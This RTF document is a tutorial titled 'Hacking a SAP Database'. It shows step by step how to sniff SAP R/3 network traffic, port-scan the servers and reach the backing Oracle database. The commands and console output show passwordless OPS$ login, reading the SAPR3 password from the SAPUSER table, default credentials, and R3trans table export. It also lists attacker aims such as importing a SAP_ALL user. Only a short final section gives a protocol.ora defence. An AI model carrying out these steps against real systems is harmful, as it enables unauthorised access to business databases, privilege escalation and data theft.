{\rtf1\ansi\deff0
{\fonttbl{\f2\fnil\fcharset0 Courier New;}
{\f1\fnil\fcharset0 Arial;}
{\f0\fnil\fcharset0 Times New Roman;}
}
{\colortbl;}{\stylesheet{\s1 Heading 1;}{\s2 Heading 2;}{\s3 Heading 3;}{\s4 Heading 4;}{\s5 Heading 5;}{\s6 Heading 6;}{\s7 Heading 7;}{\s8 Heading 8;}{\s9 Heading 9;}}
\deflang1024\notabind\facingp\hyphauto1\widowctrl
\sectd\plain\pgwsxn11905\pghsxn16837\marglsxn1440\margrsxn1440\margtsxn1440\margbsxn1920\headery0\footery0\pgndec\titlepg{\headerf\pard\sl-240\sb770\sa430\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {}\par}{\footerf\pard\sl-240\sb770\sa910\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {\i \chpgn }\par}{\headerl\pard\sl-240\sb770\sa430\plain\tqc\tx4512\tqr\tx9025 {\i Hacking a SAP Database}\tab {}\tab {}\par}{\footerl\pard\sl-240\sb770\sa910\plain\tqc\tx4512\tqr\tx9025 {\i \chpgn }\tab {}\tab {}\par}{\headerr\pard\sl-240\sb770\sa430\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {\i Hacking a SAP Database}\par}{\footerr\pard\sl-240\sb770\sa910\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {\i \chpgn }\par}\pard\sb448\li960\sl776\qc \b\fs59\f1 Hacking a SAP Database\keepn\hyphpar0\par\pard\sb259\li960\sl539\qc \fs41 Jochen Hein\keepn\hyphpar0\par\pard\sb311\s1\sl539 1. How to hack an SAP system\keepn\hyphpar0\par\pard\sb240\brdrt\brdrs\brdrw40\brsp120\li1720\ri240\brdrl\brdrs\brdrw40\brsp240\li1720\ri240\brdrb\brdrs\brdrw40\brsp0\li1720\ri240\brdrr\brdrs\brdrw40\brsp240\li1720\ri240\sl449\qc \fs34 Warning\keepn\hyphpar0\par\pard\sb120\brdrt\brdrs\brdrw40\brsp120\li1720\ri240\brdrl\brdrs\brdrw40\brsp240\li1720\ri240\brdrb\brdrs\brdrw40\brsp0\li1720\ri240\brdrr\brdrs\brdrw40\brsp240\li1720\ri240\sl286\qj \b0\fs22\lang1033 Kids, don't do that at home. We are only using tools and technics that are long known...\keepn\par\pard\brdrt\brdrs\brdrw40\brsp120\li1720\ri240\brdrl\brdrs\brdrw40\brsp240\li1720\ri240\brdrb\brdrs\brdrw40\brsp0\li1720\ri240\brdrr\brdrs\brdrw40\brsp240\li1720\ri240\sl-120\keepn\par\pard\sl-1\par\pard\sb259\s2\sl449 \b\fs34\lang1024 1.1. Getting access with network means\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 We are starting with no knowledge about the system or the network (beside guessing that there is an R/3 system). Since most SAP customers are using an Oracle database chances for such a system are high. Our tool of choice is a Laptop with some network tools, an Oracle client, and the SAP kernel. We need network access, for example an unused port, a mini-hub, or we use a port connected to a printer. And now we start sniffing the network traffic.\par\pard\sb120\li960\sl312\qj SAP R/3 system communicate on possibly many ports. The application server listens on a port from 3200 to 3299, the message server on a port in the range 3600 to 3699. The last two numbers are called the system number. You can change the port numbers, but chances are very high, that the customer uses ports in these ranges. Have a look at the command line for \b tcpdump\b0  ({\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_sniffer}{\fldrslt Figure 1}}). There are other tools as well that you can use.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sniffer}{\*\bkmkend ID_fig_45_sniffer}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 #!/bin/sh\sa0\par\fi0\sb0
\fs19    \~\fs21 tcpdump -n -i eth0 'tcp[13] & 3 != 0 and \\\sa0\par\fi0\sb0
\fs19    \~\fs21                    (( tcp[2:2] >= 3200 tcp[2:2] < 3300) or \\\sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21                     ( tcp[2:2] >= 3600 tcp[2:2] < 3700))'\sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 1. Packet sniffer\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \lang1033 tcpdump\b0  will show all connects to the application servers. The expression \fs21\f2 tcp[13] & 3 != 0\fs24\f0  matches these TCP packets. The option \fs21\f2 -n\fs24\f0  displays only IP addresses, no names. We note the output ({\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_sniffer_45_2}{\fldrslt Figure 2}}, the output has bee shortened.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sniffer_45_2}{\*\bkmkend ID_fig_45_sniffer_45_2}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 \sa0\par\fi0\sb0
192.168.1.1.4722 > 192.168.10.1.3200\sa0\par\fi0\sb0
\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 2. sniffer output\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\lang1033 We know one or more SAP application servers, and can now start looking at them in more detail. First defense against the sniffing attack is using a switch (most people do that by now). Nevertheless there are attacks against switches that degrade them to hubs. After that, the sniffing attack is again possible.\par\pard\sb120\li960\sl312\qj We now choose an unused IP address for our laptop (or use DHCP). Now we face the danger to get detected, since we are using an active network setup. It might be helpful to sniff DNS packets to get the IP address of the DNS server.\par\pard\sb120\li960\sl312\qj We use \b SAPGUI\b0  to connect to the SAP system. The last line in the window is the status line which tells us the System-ID. The System-ID is the same as the Oracle System-ID (if Oracle is used). If we have seen a connection to port 36\i\f2 nr\i0\f0  we can use \b lgtst\b0  to get more information about the system.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_lis_45_sapgui_45_connect}{\*\bkmkend ID_lis_45_sapgui_45_connect}\fs19\lang1024\f2    \~\fs21 SAPGUI\sa0\par\fi0\sb0
\fs19    \~\fs21     /H/\i victim-IP\i0 /S/\i victim-Port\i0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 3. Using SAPGUI\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb259\s2\sl449 \fs34\f1 1.2. Preparing the attack\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 We are now looking for the database server of the SAP system. A portscan on the SAP application server might reveal a message server and an Oracle port ({\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_nmap}{\fldrslt Figure 4}}).\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_nmap}{\*\bkmkend ID_fig_45_nmap}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 nmap -p 3200-3699 <ip-address> {\*\bkmkstart ID_co_45_nmap_45_sap}{\*\bkmkend ID_co_45_nmap_45_sap}\b (1)\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 nmap -p 1527 <ip-address> {\*\bkmkstart ID_co_45_nmap_45_oracle}{\*\bkmkend ID_co_45_nmap_45_oracle}\b (2)\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21     \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 4. Using a Portscanner\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li1320\sl312\fi-360\qj \tx1320 (1)\tab \b0 These are the ports of the SAP-Dispatcher (32\i\f2 xx\i0\f0 ), possibly gateway processes (33\i\f2 xx\i0\f0 ) and message server (36\i\f2 xx\i0\f0 ).\hyphpar0\par\pard\sb120\li1320\sl312\fi-360\qj \tx1320 \b (2)\tab \b0 Looking for an Oracle Listener. Sometimes other ports are used as well...\hyphpar0\par\pard\sb120\li960\sl312\qj \lang1033 A wild guess: We are facing a SAP system with database and central instance on one machine. We can verify that with \b sapinfo\b0  ({\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_sapinfo}{\fldrslt Figure 5}}). \b sapinfo\b0  is part of the RFC-SDK on the GUI CD.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sapinfo}{\*\bkmkend ID_fig_45_sapinfo}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 cracker# \fs21  \b sapinfo awhost=\i ip-address\i0  sysnr=\i nr\b0\i0 \sa0\par\fi0\sb0
\fs19    \~\fs21 SAP System Information\sa0\par\fi0\sb0
\fs19    \~\fs21 -----------------------------------------------\sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 Destination            \i hostname\i0 _\i SID\i0 _\i nr\i0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 Host                   \i hostname\i0 \sa0\par\fi0\sb0
\fs19    \~\fs21 System ID              \i SID\i0      \sa0\par\fi0\sb0
\fs19 \~10\~\fs21 Database               \i SID\i0      \sa0\par\fi0\sb0
\fs19    \~\fs21 DB host                \i hostname\i0 \sa0\par\fi0\sb0
\fs19    \~\fs21 DB system              ORACLE    \sa0\par\fi0\sb0
\fs19    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 SAP release            40B \sa0\par\fi0\sb0
\fs19 \~15\~\fs21 SAP kernel release     40B \sa0\par\fi0\sb0
\fs19    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 RFC Protokoll          011\sa0\par\fi0\sb0
\fs19    \~\fs21 Characters             1100\sa0\par\fi0\sb0
\fs19    \~\fs21 Integers               BIG\sa0\par\fi0\sb0
\fs19 \~20\~\fs21 Floating P.            IE3\sa0\par\fi0\sb0
\fs19    \~\fs21 SAP machine id           320\sa0\par\fi0\sb0
\fs19    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 Timezone                 3600 (Daylight saving time)\sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 5. Using sapinfo\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\lang1033 If the SAP Host has only one NIC we are ready. Otherwise it might help to use \b lgtst\b0  or queries to the DNS server to guess the right IP address.\par\pard\sb120\li960\sl312\qj Starting from noting we gained the following knowledge:\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19\lang1024 \'95\tab \fs24 The IP addresse(s) of the victim\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 The SAP systemnumber (last to numbers of the SAP port)\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 The System-ID of the SAP system and the oracle database\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 The name of the database server\hyphpar0\par\pard\sb120\li960\sl312\qj \lang1033 This is all wee need to know about the database, so we now launch our attack.\par\pard\sb259\s2\sl449 \b\fs34\lang1024\f1 1.3. Getting access to the Oracle database\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 We craft a SQL-NetV2 konfiguration which will give us access to the database. We need the file \fs21\f2 sqlnet.ora\fs24\f0  (default SAP file, see {\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_sqlnet}{\fldrslt Figure 6}}) and a file called \fs21\f2 tnsnames.ora\fs24\f0  ({\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_tnsnames}{\fldrslt Figure 7}}). The environment variable TNS_ADMIN contains the path to these files, but on our laptop we are free to use whatever we like anyway.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sqlnet}{\*\bkmkend ID_fig_45_sqlnet}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 ################\sa0\par\fi0\sb0
\fs19    \~\fs21 # Filename......: template sqlnet.ora\sa0\par\fi0\sb0
\fs19    \~\fs21 # Name..........: \sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21 # Date..........: \sa0\par\fi0\sb0
\fs19    \~\fs21 ################\sa0\par\fi0\sb0
\fs19    \~\fs21 AUTOMATIC_IPC = ON\sa0\par\fi0\sb0
\fs19    \~\fs21 TRACE_LEVEL_CLIENT = OFF\sa0\par\fi0\sb0
\fs19    \~\fs21 SQLNET.EXPIRE_TIME = 0\sa0\par\fi0\sb0
\fs19 \~10\~\fs21 NAMES.DEFAULT_DOMAIN = world\sa0\par\fi0\sb0
\fs19    \~\fs21 NAME.DEFAULT_ZONE = world\sa0\par\fi0\sb0
\fs19    \~\fs21 #SQLNET.AUTHENTICATION_SERVICES = (ALL)\sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 6. The file \fs21\f2 sqlnet.ora\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_tnsnames}{\*\bkmkend ID_fig_45_tnsnames}\b0\fs19    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i SID\i0 .world =\sa0\par\fi0\sb0
\fs19    \~\fs21   (DESCRIPTION =\sa0\par\fi0\sb0
\fs19    \~\fs21     (ADDRESS_LIST =\sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21         (ADDRESS =\sa0\par\fi0\sb0
\fs19    \~\fs21           (COMMUNITY = sap.world)\sa0\par\fi0\sb0
\fs19    \~\fs21           (PROTOCOL = TCP)\sa0\par\fi0\sb0
\fs19    \~\fs21           (Host = \i hostname\i0 )\sa0\par\fi0\sb0
\fs19    \~\fs21           (Port = 1527)\sa0\par\fi0\sb0
\fs19 \~10\~\fs21         )\sa0\par\fi0\sb0
\fs19    \~\fs21     )\sa0\par\fi0\sb0
\fs19    \~\fs21     (CONNECT_DATA =\sa0\par\fi0\sb0
\fs19    \~\fs21        (SID = \i SID\i0 )\sa0\par\fi0\sb0
\fs19    \~\fs21        (GLOBAL_NAME = \i SID\i0 .world)\sa0\par\fi0\sb0
\fs19 \~15\~\fs21     )\sa0\par\fi0\sb0
\fs19    \~\fs21   )\sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 7. The file \fs21\f2 tnsnames.ora\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\fs24\lang1033\f0 If the default passwords have not been changed we can use the SQL command \b connect sapr3/sap@\i\f2 SID\b0\i0\f0  in \b svrmgrl\b0  to cennect to the database \'96 thank you for playing. Otherwise we have to use the OPS$ access to get the SAPR3 password ({\field{\*\fldinst   HYPERLINK  \\l ID_fig_45_opsuser}{\fldrslt Figure 8}}). So create a user \i\fs21\f2 sid\i0 adm\fs24\f0  and start playing...\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_opsuser}{\*\bkmkend ID_fig_45_opsuser}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b setenv TNS_ADMIN $HOME/\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b setenv ORACLE_HOME /oracle/\i SID\b0\i0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b setenv ORACLE_SID \i SID\b0\i0 \sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21 \i\fs19 sid\i0 adm>\fs21  \b svrmgrl\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 \sa0\par\fi0\sb0
Oracle Server Manager Release 3.0.6.0.0 - Production\sa0\par\fi0\sb0
\sa0\par\fi0\sb0
(c) Copyright 1999, Oracle Corporation.  All Rights Reserved.\sa0\par\fi0\sb0
\sa0\par\fi0\sb0
Oracle8 Enterprise Edition Release 8.0.6.1.0 - Production\sa0\par\fi0\sb0
PL/SQL Release 8.0.6.1.0 - Production\sa0\par\fi0\sb0
\sa0\par\fi0\sb0
SVRMGR>\fs21  \b connect /@\i SID\b0\i0  {\*\bkmkstart ID_co_45_ops}{\*\bkmkend ID_co_45_ops}\b (1)\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 Connected.\sa0\par\fi0\sb0
SVRMGR>\fs21  \b select * from sapuser;\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 USERID PASSWD\sa0\par\fi0\sb0
------ ------\sa0\par\fi0\sb0
SAPR3  geheim\sa0\par\fi0\sb0
1 row selected.\sa0\par\fi0\sb0
SVRMGR>\fs21  \b connect SAPR3/geheim@\i SID\b0\i0  {\*\bkmkstart ID_co_45_sap}{\*\bkmkend ID_co_45_sap}\b (2)\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 Connected.\sa0\par\fi0\sb0
SVRMGR>\fs21 \sa0\par\fi0\sb0
\fs19 \~10\~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 8. Hacking Oracle\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li1320\sl312\fi-360\qj \tx1320 (1)\tab \b0 We connect as the OPS$-User, no password needed.\hyphpar0\par\pard\sb120\li1320\sl312\fi-360\qj \tx1320 \b (2)\tab \b0 Table \fs21\f2 SAPUSER\fs24\f0  contains the password and we are set.\hyphpar0\par\pard\sb259\s2\sl449 \b\fs34\f1 1.4. Ideas\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 Current SAP R/3 releases store the SAPR3 password encrypted in the table SAPUSER. We have two ways out:\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19\lang1024 \'95\tab \fs24 Attack the encryption.\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 Use SAP tools to access the database, for example \b R3trans\b0 .\sa240\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx7825\dppty0\dpx1200\dpy0\dpxsize7825\dpysize0\dplinew40}\keepn\par\pard\sb120\li1200\sl281\qj \fs19\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b export PATH="$PATH:/oracle/\i SID\i0 /817_32/bin:/usr/sap/\i SID\i0 /SYS/exe/run"\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b export dbms_type=oraexport DIR_LIBRARY=/usr/sap/\i SID\i0 /SYS/exe/run\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b export dbs_ora_tnsname=\i SID\b0\i0 \sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21 \i\fs19 sid\i0 adm>\fs21  \b export TNS_ADMIN=/home/sidadm\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b cat control\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 export\sa0\par\fi0\sb0
compress=no\sa0\par\fi0\sb0
client=000\sa0\par\fi0\sb0
# select table where name = T000\sa0\par\fi0\sb0
select * from t000\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \i\fs19 sid\i0 adm>\fs21  \b R3trans control\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 ...\sa0\par\fi0\sb0
\fs19 \~10\~\fs21 \i\fs19 sid\i0 adm>\fs21  \b strings trans.dat\b0 \sa0\par\fi0\sb0
\fs19    \~\fs21 \fs19 ...\sa0\par\fi0\sb0
q  000SAP AG             Walldorf               DEM [...]\sa0\par\fi0\sb0
q  001Auslieferungsmandant R11 Kundstadt        EUR [...]\sa0\par\fi0\sb0
...\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 \keepn\hyphpar0\par\pard\sb120\li1200\sl312\qj \b\fs24\f0 Figure 9. R3trans for Oracle access\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx7825\dppty0\dpx1200\dpy0\dpxsize7825\dpysize0\dplinew40}\par\pard\sb240\li1200\sl312\qj \b0\lang1033 An attacker might do:\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17\lang1024 \'95\tab \fs24 clientremove ;-)\hyphpar0\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17 \'95\tab \fs24 export tables and analyze them offline\hyphpar0\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17 \'95\tab \fs24 import a user with SAP_ALL rights\hyphpar0\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17 \'95\tab \fs24 import other data\hyphpar0\par\pard\sb259\s2\sl449 \b\fs34\f1 1.5. Wrapup\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 Hacking is fun. The only means against the attack is denying access to the database port, either with a packet filter or with a \fs21\f2 protocol.ora\fs24\f0  configuration ({\field{\*\fldinst   HYPERLINK  \\l ID_lis_45_protocol_46_ora}{\fldrslt Figure 10}}).\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_lis_45_protocol_46_ora}{\*\bkmkend ID_lis_45_protocol_46_ora}\fs19\lang1024\f2    \~\fs21 \sa0\par\fi0\sb0
\fs19    \~\fs21 tcp.nodelay = true\sa0\par\fi0\sb0
\fs19    \~\fs21 tcp.validnode_checking = yes\sa0\par\fi0\sb0
\fs19    \~\fs21 tcp.invited_nodes = ( \fs19 ip address\fs21 , \fs19 ip address\fs21  )\sa0\par\fi0\sb0
\fs19 \~\~5\~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 10. The file \fs21\f2 protocol.ora\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\fs24\lang1033\f0 The only drawback is that a new application server must be added here too, as well as other systems of the transport landscape might be (for test imports).\par\pard\sb259\s2\sl449 \b\fs34\lang1024\f1 1.6. OSS-Notes\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 Note 186119, 361641, 50088.\par}